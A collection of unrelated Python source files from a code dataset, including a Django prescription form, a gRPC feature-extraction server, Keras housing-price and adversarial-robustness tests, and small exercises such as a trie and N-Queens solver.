Save this to a new dataframe\ncheckout_condensed = checkout_wide[['trainee_id','Training', 'Discussion', 'Homework', 'Demo']]\n\n# Aggregate this to a table that has counts grouped by each combination of checkout steps\ncheckout_counts = checkout_condensed.groupby(['Training', 'Discussion', 'Homework', 'Demo']).size().reset_index()\ncheckout_counts.rename(columns={0:\"count\"}, inplace=True)\n\ncheckout_counts.to_json('checkout_counts.json', orient='records')","sub_path":"python/checkout_steps.py","file_name":"checkout_steps.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"419427584","text":"import time\n\nimport numpy as np\n\nTEMPS = np.linspace(.3,.8,5)\n#TEMPS = np.linspace(1.3,1.2,2)\n\nARGS = [instruments, plane2]\nKWARGS = [ {'x':-77, 'y':-14, 'z0':-10,'scan_rate':2}, \n           {'x':-350,'y':-100,'z0':-10,'scan_rate':2} ]\nKWARGS_r = {'zstart':-400}\nINST = lakeshore\nPARAM = 'pid_setpoint'\n\n\ndef wait_until_t_stable(t, lakeshore, s):\n    starttime = time.time()\n    print(\"Waiting until T={0}\".format(t))\n    while (starttime + 1800 > time.time()):\n        if(abs(lakeshore.T[6] - t) < .01):\n            print(\"T={0}\".format(lakeshore.T[6]))\n            break\n        time.sleep(10)\n    #print(\"Tuning SFlux\")\n    #s.autotune_sflux(instruments['daq'], 'dc', P=10, exittime=120)\n\ndef log(measurement, lakeshore):\n    measurement.notes = 'Temperature series, T={0}'.format(lakeshore.T[6])\n    return 'T={0}'.format(lakeshore.T[6])\n\ntemperatures=[]\nfor T in TEMPS:\n    temperatures.append(T)\n    temperatures.append(T)\n\nconstructors = [Heightsweep for t in temperatures]\nc_args = [ ARGS for t in temperatures]\nc_kwargs=[ KWARGS[i%2] for i in range(len(temperatures))]\nr_args =[ [] for i in range(len(temperatures))]\nr_kwargs=[ KWARGS_r for i in range(len(temperatures))]\ninstrument_to_varry = [INST for t in temperatures]\ninstrument_parameter = [PARAM for t in temperatures]\nwaitfncts = [wait_until_t_stable for t in temperatures]\nwait_fncts_args = [[t, lakeshore, s] for t in temperatures]\nlog_fncts = [log for t in temperatures]\nlog_fncts_args = [[lakeshore] for t in temperatures]\n\n\nnm = NestedMeasurement(\n            constructors,\n            c_args,\n            c_kwargs,\n            r_args,\n            r_kwargs,\n            instrument_to_varry,\n            instrument_parameter,\n            temperatures,\n            waitfncts,\n            wait_fncts_args,\n            log_fncts,\n            log_fncts_args\n            )\n\n#nm.run()\n","sub_path":"2017/09/setups/nested_heightseries_20171002_testing.py","file_name":"nested_heightseries_20171002_testing.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"247866863","text":"\"\"\"\nAdd Prescription form\n\nDjango form for adding medical information.\n\n=== Fields ===\n\npatient -- (CharField) email ID of the patient that is associated with the prescription.\ndrug ----- (CharField) name of the drug being prescribed.\nrefills -- (IntegerField) number of refills available for the prescription.\nnotes ---- (CharField) any notes for the prescriptions.\n\n=== Methods ===\n\n__init__ --------- Initializes the form.\nbuild_form_dict -- Creates a dictionary of all the add prescription forms for each patient.\nhandle_post ------ Creates the prescription given a completed form.\n\"\"\"\n\nfrom django import forms\nfrom django.utils import timezone\nfrom HealthApp import staticHelpers\nfrom HealthApp.models import Prescription, LogEntry, Patient, Message\n\n\nclass AddPrescription(forms.ModelForm):\n    def __init__(self, patient):\n        super().__init__()\n        
staticHelpers.set_form_id(self, \"AddPrescription\")\n\n        self.fields['patient'] = forms.CharField(widget=forms.HiddenInput(), initial=patient.username)\n\n        self.fields['drug'].widget.attrs = {'class': 'form-control', 'placeholder': 'Drug Name'}\n        self.fields['refills'].widget.attrs = {'class': 'form-control', 'placeholder': 'Refills'}\n        self.fields['notes'].widget.attrs = {'class': 'form-control', 'placeholder': 'Notes'}\n\n    class Meta:\n        model = Prescription\n        fields = ['drug', 'patient', 'refills', 'notes']\n\n    @classmethod\n    def build_form_dict(cls, all_patients):\n        forms_dict = dict()\n\n        for patient in all_patients:\n            forms_dict[patient.username] = AddPrescription(patient)\n\n        return forms_dict\n\n    @classmethod\n    def handle_post(cls, user_type, doctor, post_data):\n        if user_type == staticHelpers.UserTypes.doctor:\n            if post_data['drug'] != \"\":\n                prescription = Prescription(drug=post_data['drug'], doctor=doctor,\n                                            patient=Patient.objects.get(username=post_data['patient']),\n                                            date=timezone.now(), refills=post_data['refills'],\n                                            notes=post_data['notes'])\n                prescription.save()\n            # user_type is always doctor inside this branch, so notify the patient directly\n            Message.sendNotifMessage(post_data['patient'], \"New Prescription\", doctor.username +\n                                     \" has created a prescription for \" + post_data['drug'] + \" for you\")\n        LogEntry.log_action(doctor.username, \"Added prescription for \" + post_data['patient'])\n","sub_path":"HealthApp/forms/add_prescription.py","file_name":"add_prescription.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"506618603","text":"## Bulk image resizer\n\n# This script simply resizes all the images in a folder to one-eighth their\n# original size. 
It's useful for shrinking large cell phone pictures down\n# to a size that's more manageable for model training.\n\n# Usage: place this script in a folder of images you want to shrink,\n# and then run it.\n\nimport numpy as np\nimport cv2\nimport os\nimport sys\nif len(sys.argv) > 1:  # avoid an IndexError when no folder argument is given\n    dir_path = sys.argv[1]\nelse:\n    dir_path = os.getcwd()\n\nprint(\"Current Path: \",dir_path)\n\nfor filename in os.listdir(dir_path):\n    # If the images are not .JPG images, change the line below to match the image type.\n    if filename.endswith(\".JPG\") or filename.endswith(\".jpg\"):\n        filename = os.path.join(dir_path,filename)\n        fileSize = os.path.getsize(filename)\n        print(\"Image File: \",filename,fileSize)\n        # file > 200KB to convert\n        if fileSize > 200*1024:\n            image = cv2.imread(filename)\n            resized = cv2.resize(image,None,fx=0.125, fy=0.125, interpolation=cv2.INTER_AREA)\n            cv2.imwrite(filename,resized)\n","sub_path":"resizer.py","file_name":"resizer.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"436937990","text":"#File I/O Test Question 1\n#Jihal Patel\n#765697\n#ICS4U0-A\n#25 May 2018\n\nfile = open('sX.txt', 'r') #Opens the file containing the input\nfileContents = file.readlines() #Reads each line in the file if there is more than 1\nfile.close() #Closes opened file \nletters = [] #Creates a list to store each letter in the text separately\ntCount = 0 #Creates a variable to count the \"t\"s and \"T\"s\nsCount = 0 #Creates a variable to count the \"s\"s and \"S\"s\nfor i in range(len(fileContents)): #Goes through each line in the file\n    letters.append(list(fileContents[i])) #Separates every single letter in the file\nfor j in range(len(letters)): #Goes through each line in the file\n    for k in range(len(letters[j])): #Goes through each letter in the jth line\n        if letters[j][k] == \"t\" or letters[j][k] == \"T\": #Checks if letter is 't' or 'T'\n            tCount+=1 #If the letter is 't' or 'T' then add one to tCount\n        elif letters[j][k] == \"s\" or letters[j][k] == \"S\": #Checks if letter is 's' or 'S' \n            sCount+=1 #If the letter is 's' or 'S' then add one to sCount\nif tCount > sCount: #If there are more 't's or 'T's in the input\n    print(\"English\") #Print English if above condition is met\nelif sCount > tCount: #If there are more 's's or 'S's in the input\n    print(\"French\") #Print French if above condition is met\nelse: #If both 's's or 'S's and 't's or 'T's are equal\n    print(\"French\") #Print French if above condition is met\n","sub_path":"Python/File Reading/File Test 1.py","file_name":"File Test 1.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"507406657","text":"import json\nimport os\nimport time\nfrom concurrent import futures\n\nimport cv2\n# rpc imports\nimport grpc\nimport numpy as np\nimport tensorflow as tf\nfrom PIL import Image\n\nfrom hysia.dataset.srt_handler import extract_srt\nfrom hysia.models.nlp.sentence import TF_Sentence\nfrom hysia.models.object.audioset_feature_extractor import AudiosetFeatureExtractor\nfrom hysia.models.scene.detector import scene_visual\nfrom hysia.utils.logger import Logger\nfrom hysia.utils.perf import StreamSuppressor\nfrom protos import api2msl_pb2, api2msl_pb2_grpc\n\n# Time constant\n_ONE_DAY_IN_SECONDS = 24 * 60 * 60\n\nSERVER_ROOT = os.path.dirname(os.path.abspath(__file__)) + '/'\n\nlogger = Logger(\n    name='feature_extract_model_server',\n    
severity_levels={'StreamHandler': 'ERROR'}\n)\n\nsentence_model_path = os.path.join(SERVER_ROOT,\n '../../weights/sentence/96e8f1d3d4d90ce86b2db128249eb8143a91db73')\nvggish_fr_path = os.path.join(SERVER_ROOT, '../../weights/audioset/vggish_fr.pb')\n\nvggish_pca_path = os.path.join(SERVER_ROOT, '../../weights/audioset/vggish_pca_params.npz')\n\nresnet_places365_path = os.path.join(SERVER_ROOT, '../../weights/places365/{}.pth')\n\nplace365_category_path = os.path.join(SERVER_ROOT, '../../weights/places365/categories.txt')\n\n\ndef load_sentence_model():\n # Instantiate sentence feature extractor\n return TF_Sentence(sentence_model_path)\n\n\ndef load_audio_model():\n # Instantiate audio feature extractor\n with StreamSuppressor():\n vgg_graph = tf.Graph()\n with vgg_graph.as_default():\n od_graph_def = tf.GraphDef()\n with tf.gfile.GFile(vggish_fr_path, 'rb') as fid:\n serialized_graph = fid.read()\n od_graph_def.ParseFromString(serialized_graph)\n tf.import_graph_def(od_graph_def, name='')\n\n audio_model = AudiosetFeatureExtractor(vgg_graph, vggish_pca_path)\n return audio_model\n\n\ndef load_image_model():\n # Instantiate scene feature extractor\n return scene_visual('resnet50', resnet_places365_path, place365_category_path, 'cuda:0')\n\n\n# Custom request servicer\nclass Api2MslServicer(api2msl_pb2_grpc.Api2MslServicer):\n def __init__(self):\n super().__init__()\n os.environ['CUDA_VISIBLE_DEVICES'] = '3'\n logger.info('Using GPU:' + os.environ['CUDA_VISIBLE_DEVICES'])\n self.sentence_model = load_sentence_model()\n self.audio_model = load_audio_model()\n self.image_model = load_image_model()\n\n def GetJson(self, request, context):\n res = {}\n meta = request.meta\n meta = meta.split(',')\n # Process entire audio file\n # Extract nlp feature from subtitle\n if 'subtitle' in meta:\n subtitle_path = request.buf.decode()\n logger.info('Extracting from subtitle: ' + subtitle_path)\n start_time = int(meta[1])\n end_time = int(meta[2])\n sentences = extract_srt(start_time, end_time, subtitle_path)\n if len(sentences) == 0:\n sentences_feature = 'unknown_feature'\n sentences = 'unknown_subtitle'\n else:\n # TODO TEXT support what data types (BLOB only support numpy)\n sentences = ' '.join(sentences)\n sentences_feature = self.sentence_model.encode(sentences)\n res['features'] = sentences_feature\n return api2msl_pb2.JsonReply(json=json.dumps(res), meta=sentences)\n\n # Extract audio feature\n if 'audio' in meta:\n audio_path = request.buf.decode()\n logger.info('Extracting from audio: ' + audio_path)\n start_time = int(meta[1])\n end_time = int(meta[2])\n audio_feature = self.audio_model.extract(audio_path, start_time, end_time)[0]\n res['features'] = audio_feature.tolist()\n return api2msl_pb2.JsonReply(json=json.dumps(res), meta='')\n if 'scene' in meta:\n img = cv2.imdecode(np.fromstring(request.buf, dtype=np.uint8), -1)\n logger.info('Extracting from image of shape ' + str(img.shape))\n img_pil = Image.fromarray(img)\n scene_feature = self.image_model.extract_vec(img_pil, True)\n scene_name = self.image_model.detect(img_pil, True)\n res['features'] = scene_feature.tolist()\n return api2msl_pb2.JsonReply(json=json.dumps(res), meta=scene_name['scene'][0])\n\n return api2msl_pb2.JsonReply(json=json.dumps(res), meta='')\n\n\ndef main():\n # gRPC server configurations\n server = grpc.server(futures.ThreadPoolExecutor(max_workers=8))\n api2msl_pb2_grpc.add_Api2MslServicer_to_server(Api2MslServicer(), server)\n server.add_insecure_port('[::]:50055')\n server.start()\n logger.info('Listening on 
port 50055')\n try:\n while True:\n time.sleep(_ONE_DAY_IN_SECONDS)\n except KeyboardInterrupt:\n logger.info('Shutting down feature extract model server')\n server.stop(0)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"server/model_server/feature_extract_model_server.py","file_name":"feature_extract_model_server.py","file_ext":"py","file_size_in_byte":5025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"389413203","text":"import random\nfrom math import sqrt\n\nimport tensorflow as tf\nfrom tensorflow import keras\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n###\n# Import the boston dataset into separate train/test AND input/result arrays\n# (13+1 columns for every row - 404 rows in train data - 102 rows in test data)\n#\n# x_train:\n# 0: CRIM: Per capita crime rate by town\n# 1: ZN: Proportion of residential land zoned for lots over 25,000 sq. ft\n# 2: INDUS: Proportion of non-retail business acres per town\n# 3: CHAS: Charles River dummy variable (= 1 if tract bounds river; 0 otherwise)\n# 4: NOX: Nitric oxide concentration (parts per 10 million)\n# 5: RM: Average number of rooms per dwelling\n# 6: AGE: Proportion of owner-occupied units built prior to 1940\n# 7: DIS: Weighted distances to five Boston employment centers\n# 8: RAD: Index of accessibility to radial highways\n# 9: TAX: Full-value property tax rate per $10,000\n# 10: PTRATIO: Pupil-teacher ratio by town\n# 11: B: 1000(Bk — 0.63)², where Bk is the proportion of [people of African American descent] by town\n# 12: LSTAT: Percentage of lower status of the population\n#\n# y_train:\n# MEDV: Median value of owner-occupied homes in $1000s\n###\nfrom tensorflow.python.keras._impl.keras.wrappers.scikit_learn import KerasRegressor\n\n(x_train, y_train), (x_test, y_test) = keras.datasets.boston_housing.load_data()\n\n###\n# Describe dataset\n###\nprint(\"The train input is a touple of shape: \" + str(x_train.shape))\nprint(\"The train output is an array of length: \" + str(len(y_train)))\n\nmedian_value_array = y_train\nplt.title(\"Overview of mean value in dataset\")\nplt.xlabel(\"Median value of Home (k$)\")\nplt.ylabel(\"Nr of occurences in test data\")\nplt.hist(median_value_array)\n# plt.show()\n\ncrim_rate = np.array(x_train[:, 0])\n\nplt.title(\"Value/Crime Rate\")\nplt.xlabel(\"Crime Rate (per town capita)\")\nplt.ylabel(\"Median value of Home (k$)\")\nplt.scatter(crim_rate, median_value_array, linestyle='None')\n# plt.show()\n\naverage_number_of_rooms = np.array(x_train[:, 5])\nplt.title(\"Value/Number of rooms\")\nplt.xlabel(\"Average number of rooms\")\nplt.ylabel(\"Median value of Home (k$)\")\nplt.scatter(average_number_of_rooms, median_value_array, linestyle='None')\n# plt.show()\n\nfor x in range(0, 200):\n scale_int = random.randint(0, 100)\n amountOfLayers = 0\n if (scale_int < 50):\n amountOfLayers = 1\n elif (scale_int < 65):\n amountOfLayers = 2\n elif (scale_int < 80):\n amountOfLayers = 3\n elif (scale_int < 90):\n amountOfLayers = 4\n layerToAdd = 1\n ###\n # Initiate Model\n ###\n layer_sizes=[random.randint(6,13) for _ in range(amountOfLayers+1)]\n model = keras.Sequential()\n model.add(keras.layers.Dense(layer_sizes[0], activation=tf.nn.relu, kernel_initializer='normal', input_shape=(13,)))\n # model.add(keras.layers.Dropout(0.2)) # Not Overfitting data\n while (layerToAdd <= amountOfLayers):\n layerToAdd = layerToAdd + 1\n model.add(keras.layers.Dense(layer_sizes[1], kernel_initializer='normal', activation=tf.nn.relu))\n # 
model.add(keras.layers.Dense(20, kernel_initializer='normal', activation=tf.nn.relu))\n # model.add(keras.layers.Dense(4, kernel_initializer='normal', activation='relu'))\n model.add(keras.layers.Dense(1, kernel_initializer='normal'))\n model.compile(optimizer=tf.train.AdamOptimizer(),\n loss='mean_squared_error')\n\n ###\n # Train Model\n # (Fit model to training data set)\n ###\n model.fit(x_train, y_train, epochs=500, verbose=0)\n\n ###\n # Test Model\n # (get mean squared error of test data in k$)\n ###\n mean_squared_error = model.evaluate(x_test, y_test, verbose=0)\n # mean_squared_error = model.evaluate(x_train, y_train)\n # scores = model.evaluate(x_train, y_train)\n if (mean_squared_error < 200):\n print(str(x) + \":\"+str(amountOfLayers)+\" error: \" + str(round(sqrt(mean_squared_error), 2)) + \"k$ \" + str(layer_sizes))\n # pass\n # print(str(x)+\": Mean squared error on test data: \"+str(round(mean_squared_error,2))+\"k$\")\n","sub_path":"miniProject3_loop.py","file_name":"miniProject3_loop.py","file_ext":"py","file_size_in_byte":4052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"109712334","text":"from django.urls import path\n\nfrom . import views\n\napp_name = 'skurcz_to'\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('shorten/', views.shorten_long_url, name='shorten_url'),\n path('/', views.obtain_long_url, name='get_url'),\n]\n","sub_path":"skurcz/skurcz_to/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"392249411","text":"import numpy as np\n#list_of_lists = [[1,4,1],[1,3,1],[2,2,2]] \n#data = np.array(list_of_lists)\n\n#add row only and for column axis =0\n# sum = data.sum(axis=0)\n#sum = data.sum()\n#print(sum)\n\n#can direct add and do other mathematics treat as elemenet\n#add_by_1 = data + 1\n#print(add_by_1)\n\n#shape\n#print(data.shape)\n#print(type(data))\n\n#slicing in np array\n#print(data[:,:-2])\n\n\n#random \n# sale_of_coffee = np.random.randint(20,100,size=(4,7)) #generate random value from (start,end)\n# print(sale_of_coffee)\n# print(sale_of_coffee.argmax()) #return index that have high value \n# print(sale_of_coffee.max())\n\nlist_a = [[1,2,1],[2,22,2]]\nlist_b = [[2,6,2],[2,21,2]]\na = np.array(list_a)\nb = np.array(list_b)\nprint(a)\nprint(b)\nprint(a+b)\n","sub_path":"Numpy/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"477985515","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nimport unittest\n\nimport keras.backend as k\nimport tensorflow as tf\nimport numpy as np\n\nfrom art.classifiers.cnn import CNN\nfrom art.metrics import empirical_robustness\nfrom art.utils import load_mnist, load_cifar10\nfrom art.metrics import clever_t, clever_u\nfrom art.classifiers.classifier import Classifier\n\nBATCH_SIZE = 10\nNB_TRAIN = 100\nNB_TEST = 100\n\n\nclass TestMinimalPerturbation(unittest.TestCase):\n # def test_cifar(self):\n # session = tf.Session()\n # K.set_session(session)\n #\n # # get CIFAR10\n # (X_train, Y_train), (X_test, Y_test), _, _ = load_cifar10()\n # X_train, Y_train, X_test, Y_test = X_train[:NB_TRAIN], Y_train[:NB_TRAIN], X_test[:NB_TEST], Y_test[:NB_TEST]\n # im_shape = X_train[0].shape\n #\n # # Get the classifier\n # classifier = CNN(im_shape, act='relu')\n # 
classifier.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n # classifier.fit(X_train, Y_train, epochs=1, batch_size=BATCH_SIZE)\n #\n # scores = classifier.evaluate(X_test, Y_test)\n # print(\"\\naccuracy: %.2f%%\" % (scores[1] * 100))\n\n def test_emp_robustness_mnist(self):\n session = tf.Session()\n k.set_session(session)\n\n comp_params = {\"loss\": 'categorical_crossentropy',\n \"optimizer\": 'adam',\n \"metrics\": ['accuracy']}\n\n # get MNIST\n (X_train, Y_train), (_, _), _, _ = load_mnist()\n X_train, Y_train = X_train[:NB_TRAIN], Y_train[:NB_TRAIN]\n im_shape = X_train[0].shape\n\n # Get classifier\n classifier = CNN(im_shape, act=\"relu\")\n classifier.compile(comp_params)\n classifier.fit(X_train, Y_train, epochs=1, batch_size=BATCH_SIZE)\n\n # Compute minimal perturbations\n params = {\"eps_step\": 1.1,\n \"clip_min\": 0.,\n \"clip_max\": 1.}\n\n emp_robust = empirical_robustness(X_train, classifier, session, \"fgsm\", params)\n self.assertEqual(emp_robust, 0.)\n\n params = {\"eps_step\": 1.,\n \"eps_max\": 1.,\n \"clip_min\": None,\n \"clip_max\": None}\n emp_robust = empirical_robustness(X_train, classifier, session, \"fgsm\", params)\n self.assertAlmostEqual(emp_robust, 1., 3)\n\n params = {\"eps_step\": 0.1,\n \"eps_max\": 0.2,\n \"clip_min\": None,\n \"clip_max\": None}\n emp_robust = empirical_robustness(X_train, classifier, session, \"fgsm\", params)\n self.assertLessEqual(emp_robust, 0.2)\n\n # params = {\"theta\": 1.,\n # \"gamma\": 0.01,\n # \"clip_min\": 0.,\n # \"clip_max\": 1.}\n # emp_robust_jsma = empirical_robustness(X_train, classifier, session, \"jsma\", params)\n # self.assertLessEqual(emp_robust_jsma, 1.)\n\n\n#########################################\n# This part is the unit test for Clever.#\n#########################################\n\nclass TestClassifier(Classifier):\n def __init__(self, defences=None, preproc=None):\n from keras.models import Sequential\n from keras.layers import Lambda\n model = Sequential(name=\"TestClassifier\")\n model.add(Lambda(lambda x: x + 0, input_shape=(2,)))\n\n super(TestClassifier, self).__init__(model, defences, preproc)\n\n\nclass TestClever(unittest.TestCase):\n \"\"\"\n Unittest for Clever metrics.\n \"\"\"\n def test_clever_t_unit(self):\n \"\"\"\n Test the targeted version with simplified data.\n :return:\n \"\"\"\n print(\"Unit test for the targeted version with simplified data.\")\n # Define session & params\n session = tf.Session()\n k.set_session(session)\n\n # Get classifier\n classifier = TestClassifier()\n\n # Compute scores\n res = clever_t(np.array([1, 0]), classifier, 1, 20, 10, 1, session)\n\n # Test\n self.assertAlmostEqual(res[0], 0.9999999999999998, delta=0.00001)\n self.assertAlmostEqual(res[1], 0.7071067811865474, delta=0.00001)\n self.assertAlmostEqual(res[2], 0.4999999999999999, delta=0.00001)\n\n def test_clever_u_unit(self):\n \"\"\"\n Test the untargeted version with simplified data.\n :return:\n \"\"\"\n print(\"Unit test for the untargeted version with simplified data.\")\n # Define session & params\n session = tf.Session()\n k.set_session(session)\n\n # Get classifier\n classifier = TestClassifier()\n\n # Compute scores\n res = clever_u(np.array([1, 0]), classifier, 20, 10, 1, session)\n\n # Test\n self.assertAlmostEqual(res[0], 0.9999999999999998, delta=0.00001)\n self.assertAlmostEqual(res[1], 0.7071067811865474, delta=0.00001)\n self.assertAlmostEqual(res[2], 0.4999999999999999, delta=0.00001)\n\n def test_clever_t(self):\n \"\"\"\n Test the targeted 
version.\n        :return:\n        \"\"\"\n        print(\"Test if the targeted version works on a true classifier/data\")\n        # Define session & params\n        session = tf.Session()\n        k.set_session(session)\n\n        comp_params = {\"loss\": 'categorical_crossentropy', \"optimizer\": 'adam',\n                       \"metrics\": ['accuracy']}\n\n        # Get MNIST\n        (X_train, Y_train), (_, _), _, _ = load_mnist()\n        X_train, Y_train = X_train[:NB_TRAIN], Y_train[:NB_TRAIN]\n        im_shape = X_train[0].shape\n\n        # Get classifier\n        classifier = CNN(im_shape, act=\"relu\")\n        classifier.compile(comp_params)\n        classifier.fit(X_train, Y_train, epochs=1,\n                       batch_size=BATCH_SIZE, verbose=0)\n\n        res = clever_t(X_train[-1], classifier, 7, 20, 10, 5, session)\n        self.assertGreater(res[0], res[1])\n        self.assertGreater(res[1], res[2])\n\n    def test_clever_u(self):\n        \"\"\"\n        Test the untargeted version.\n        :return:\n        \"\"\"\n        print(\"Test if the untargeted version works on a true classifier/data\")\n        # Define session & params\n        session = tf.Session()\n        k.set_session(session)\n\n        comp_params = {\"loss\": 'categorical_crossentropy', \"optimizer\": 'adam',\n                       \"metrics\": ['accuracy']}\n\n        # Get MNIST\n        (X_train, Y_train), (_, _), _, _ = load_mnist()\n        X_train, Y_train = X_train[:NB_TRAIN], Y_train[:NB_TRAIN]\n        im_shape = X_train[0].shape\n\n        # Get classifier\n        classifier = CNN(im_shape, act=\"relu\")\n        classifier.compile(comp_params)\n        classifier.fit(X_train, Y_train, epochs=1,\n                       batch_size=BATCH_SIZE, verbose=0)\n\n        res = clever_u(X_train[-1], classifier, 2, 10, 5, session)\n        self.assertGreater(res[0], res[1])\n        self.assertGreater(res[1], res[2])\n\n\nif __name__ == '__main__':\n    unittest.main()\n","sub_path":"art/metrics_unittest.py","file_name":"metrics_unittest.py","file_ext":"py","file_size_in_byte":6929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"528506715","text":"# Implement Trie (Prefix Tree)\nfrom collections import defaultdict\nfrom typing import List\n\n\nclass Trie:\n\n    def __init__(self):\n        \"\"\"\n        Initialize your data structure here.\n        \"\"\"\n        self.root = TrieNode()\n\n\n    def insert(self, word: str) -> None:\n        \"\"\"\n        Inserts a word into the trie.\n        \"\"\"\n        node = self.root\n        for w in word:\n            node = node.children[w]\n        node.is_end = True\n    def search(self, word: str) -> bool:\n        \"\"\"\n        Returns if the word is in the trie.\n        \"\"\"\n        node = self.root\n        for w in word:\n            if w in node.children:\n                node = node.children[w]\n            else:\n                return False\n        return node.is_end\n\n\n    def startsWith(self, prefix: str) -> bool:\n        \"\"\"\n        Returns if there is any word in the trie that starts with the given prefix.\n        \"\"\"\n        node = self.root\n        for w in prefix:\n            if w in node.children:\n                node = node.children[w]\n            else:\n                return False\n        return True\n\nclass TrieNode:\n    def __init__(self):\n        self.children = defaultdict(TrieNode)\n        self.is_end = False\n\n\n# Word Search II\n\nclass Solution:\n    def findWords(self, board: List[List[str]], words: List[str]) -> List[str]:\n        trie = {}\n        for word in words:\n            node = trie\n            for char in word:\n                node = node.setdefault(char, {})\n            node['#'] = True\n\n        def search(i, j, node, prefix, visited):\n            if '#' in node:\n                result.add(prefix)\n                del node['#']\n            visited.add((i,j))\n            for (di, dj) in ((-1, 0), (1, 0), (0, -1), (0, 1)):\n                the_i,the_j = i+di,j+dj\n                if -1 < the_i < h and -1 < the_j < w and board[the_i][the_j] in node and (the_i, the_j) not in visited:\n                    search(the_i, the_j, node[board[the_i][the_j]], prefix+board[the_i][the_j], visited)\n                    if not node[board[the_i][the_j]]:\n                        del node[board[the_i][the_j]]\n            visited.remove((i,j))\n\n\n        result, h, w, visited = set(), 
len(board), len(board[0]), set()\n        for i in range(h):\n            for j in range(w):\n                if board[i][j] in trie:\n                    search(i, j, trie[board[i][j]], board[i][j], visited)\n                    if not trie[board[i][j]]: del trie[board[i][j]]\n        return list(result)\n\n\n\n\n\n\n\n\n\n\n# N-Queens\n\nclass Solution:\n    def solveNQueens(self, n: int) -> List[List[str]]:\n        result = []\n        cheseboard = [['.'] * n for _ in range(n)]\n\n        def backtracking(n, row, cheseboard):\n            if row == n:\n                temp_res = []\n                for temp in cheseboard:\n                    temp_str = \"\".join(temp)\n                    temp_res.append(temp_str)\n                result.append(temp_res)\n                return\n            for col in range(n):\n                if isValid(row, col, cheseboard):\n                    cheseboard[row][col] = \"Q\"\n                    backtracking(n, row + 1, cheseboard)\n                    cheseboard[row][col] = \".\"\n\n        def isValid(row, col, cheseboard):\n            for i in range(len(cheseboard)):\n                if cheseboard[i][col] == 'Q':\n                    return False\n\n            i = row - 1\n            j = col - 1\n            while i >= 0 and j >= 0:\n                if cheseboard[i][j] == 'Q':\n                    return False\n                i -= 1\n                j -= 1\n\n            i = row - 1\n            j = col + 1\n            while i >= 0 and j < len(cheseboard):\n                if cheseboard[i][j] == 'Q':\n                    return False\n                i -= 1\n                j += 1\n            return True\n\n        backtracking(n, 0, cheseboard)\n        return result","sub_path":"Week_07/zuoye.py","file_name":"zuoye.py","file_ext":"py","file_size_in_byte":3801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"307627859","text":"# Write your code here for Part 1. You are welcome to add more cells.\nimport os, re\n\n\n# print(os.path.exists(\"bc2_ips_pmid2ppi_train.txt\")) #Will print \"False\" if the file is not uploaded by first running the above cell.\n\ndef load_interactions(file_name):\n    print(os.path.exists(file_name))  # Will print \"False\" if the file is not uploaded by first running the above cell.\n    with open(file_name) as in_file:\n        data = in_file.read()  # read the whole interaction file as a single string\n    # int_id = re.findall(\"\\n([A-Z0-9]+)\\t\", data)\n    # print(int_id)\n    proteins_1 = re.findall(\"\\t([A-Z0-9]+)\\t\", data)  # captures the first protein of each interaction\n    proteins_2 = re.findall(\"([A-Z0-9]+)\\n+\", data)  # captures the second protein of each interaction\n    interaction_list = list()\n\n    for i in range(len(proteins_1)):  # Iterate through the proteins\n        interaction_list.append((proteins_1[i], proteins_2[i]))  # Append the tuple of proteins to a list\n    return interaction_list  # Returns a list of tuples\n\n\ninteractions2 = load_interactions('bc2_ips_pmid2ppi_train.txt')\n\n\ndef interact(interactions, id1, id2):\n    for tuple_proteins in interactions:  # Iterate through each tuple\n        if id1 in tuple_proteins and id2 in tuple_proteins:  # check if both id1 AND id2 are in the same tuple; True\n            return True\n    return False  # else false\n\n\nprotein1 = 'YPL094C'\nprotein2 = 'YPR086W'\n\n\n# test = 'O88643'\n# print(interact(interactions2, 'YPL094C', 'YPR086W'))\n# print(interact(interactions2, 'YPR086W', 'YPL094C'))\n\n\ndef get_interactions(interactions, id_name):\n    interacted = list()  # list to hold potential proteins that interact with id_name\n\n    for tuple_proteins in interactions:  # Iterate through each tuple\n\n        id1 = tuple_proteins[0]  # Set variable to first element in tuple\n        id2 = tuple_proteins[1]  # Set variable to second element in tuple\n\n        if id_name == id1:  # check if given id is in tuple; True, add id2 to list\n            interacted.append(id2)\n        elif id_name == id2:  # check if given id is in tuple; True, add id1 to list\n            interacted.append(id1)\n    return interacted  # Returns a list of interacted proteins\n\n\n# 
